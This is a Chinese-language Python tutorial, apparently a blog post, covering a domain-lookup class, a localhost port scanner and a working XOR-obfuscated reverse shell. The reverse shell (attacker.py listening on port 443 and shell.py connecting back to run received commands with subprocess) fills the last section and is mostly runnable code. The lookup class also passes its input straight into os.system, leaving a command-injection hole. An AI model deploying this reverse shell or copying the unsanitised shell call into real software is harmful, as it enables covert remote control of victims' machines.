0x01.python类
<p>#coding=utf-8
import os
class Domain:
def __init__(self,domain,port,protocol):
self.domain=domain
self.port=port
self.protocol=protocol
def URL(self):
if self.protocol=='https':
URL='https://'+self.domain+':'+self.port+'/'
if self.protocol=='http':
URL='http://'+self.domain+':'+self.port+'/'
return URL
def lookup(self):
os.system("host "+self.domain)
if __name__=="__main__":
domain=Domain('www.freebuf.com','80','http')
print domain.URL()
print domain.port
print domain.protocol
domain.lookup()
</p>
the end:
root@kali:~/Desktop# python ./test.py
http://www.freebuf.com:80/
80
http
www.freebuf.com has address 123.151.180.21
enviroment: kali+py2.7.3
0x02 scan port
开机了本机的ssh也就是22端口。一个简单的演示。
#coding=utf-8
import socket
ports=[21,22,53,80,443,445,3389,5050,5678,8080,8081]
hosts=['127.0.0.1']
for host in hosts:
for port in ports:
try:
s=socket.socket()
print "[+]Attempting to connect to "+host+":"+str(port)
s.connect((host,port))
s.send('adsfsafdsfadfsadfasdfasdfas /n')
banner=s.recv(1024)
if banner:
print "[+]"+host+":"+str(port)+" open: \n"+banner
s.close()
except:
pass
结果:
root@kali:~/Desktop# python ./scan.py
[+]Attempting to connect to 127.0.0.1:21
[+]Attempting to connect to 127.0.0.1:22
[+]127.0.0.1:22 open:
SSH-2.0-OpenSSH_6.0p1 Debian-4+deb7u2
[+]Attempting to connect to 127.0.0.1:53
[+]Attempting to connect to 127.0.0.1:80
[+]Attempting to connect to 127.0.0.1:443
[+]Attempting to connect to 127.0.0.1:445
[+]Attempting to connect to 127.0.0.1:3389
[+]Attempting to connect to 127.0.0.1:5050
[+]Attempting to connect to 127.0.0.1:5678
[+]Attempting to connect to 127.0.0.1:8080
[+]Attempting to connect to 127.0.0.1:8081
这只是个示例程序吧 不实用、在扫一下不能既recv又send的程序时,会卡在recv上
0x03 Reverse Shell – 反向shell
一个简单的udp server-client.py
#coding=utf-8
import socket
host=''
port=1024
bufsize=128
addr=(host,port)
udp_server=socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
udp_server.bind(addr)
while True:
print 'waiting for message...'
data,addr=udp_server.recvfrom(bufsize)
print '...received from and return to:'+str(addr)+": "+data
udp_server.close()
#coding=utf-8
import socket
host='localhost'
port=1024
bufsize=128
addr=(host,port)
udp_client=socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
while True:
data=raw_input('>')
if not data:
break
udp_client.sendto(data,addr)
udp_client.close()
接下来是一个反向shell的演示程序。
attacker.py
#coding=utf-8
import socket
"""
建立socket监听端口
"""
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(("0.0.0.0", 443))
s.listen(2048)
print "Listening on port 443... "
#接受连接 得到肉鸡
(client, (ip, port)) = s.accept()
print " recived connection from : ", ip
while True:
command = raw_input('~$ ')
encode = bytearray(command)
for i in range(len(encode)):
encode[i] ^= 0x41
client.send(encode)#send
en_data = client.recv(2048)#recv
decode = bytearray(en_data)
for i in range(len(decode)):
decode[i] ^= 0x41
print decode
client.close()
s.close()
shell.py
#!/usr/bin/python
import socket, subprocess, sys
RHOST = sys.argv[1]
RPORT = 443
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((RHOST, RPORT))
while True:
# receive XOR encoded data from network socket
data = s.recv(1024)
# XOR the data again with a '\x41' to get back to normal data
en_data = bytearray(data)
for i in range(len(en_data)):
en_data[i] ^= 0x41
# Execute the decode data as a command.
# The subprocess module is great because we can PIPE STDOUT/STDERR/STDIN to a variable
comm = subprocess.Popen(str(en_data), shell = True, stdout = subprocess.PIPE, stderr = subprocess.PIPE, stdin = subprocess.PIPE)
comm.wait()
STDOUT, STDERR = comm.communicate()
print STDERR
# Encode the output and send to RHOST
en_STDOUT= bytearray(STDOUT)
for i in range(len(en_STDOUT)):
en_STDOUT[i] ^= 0x41
s.send(en_STDOUT)
s.close()
从中可以看书 攻击者开启自己的443端口,然后在受害者上运行shell.py可使受害机器连接的攻击者的机器上,同时实用subprocess模块 执行由attacker发过来的命令,并将受害机器的命令回显发回到攻击者的机器上。 相当于一个远程shell吧。 并不是最标准的交互式shell。(nc反弹拿shell)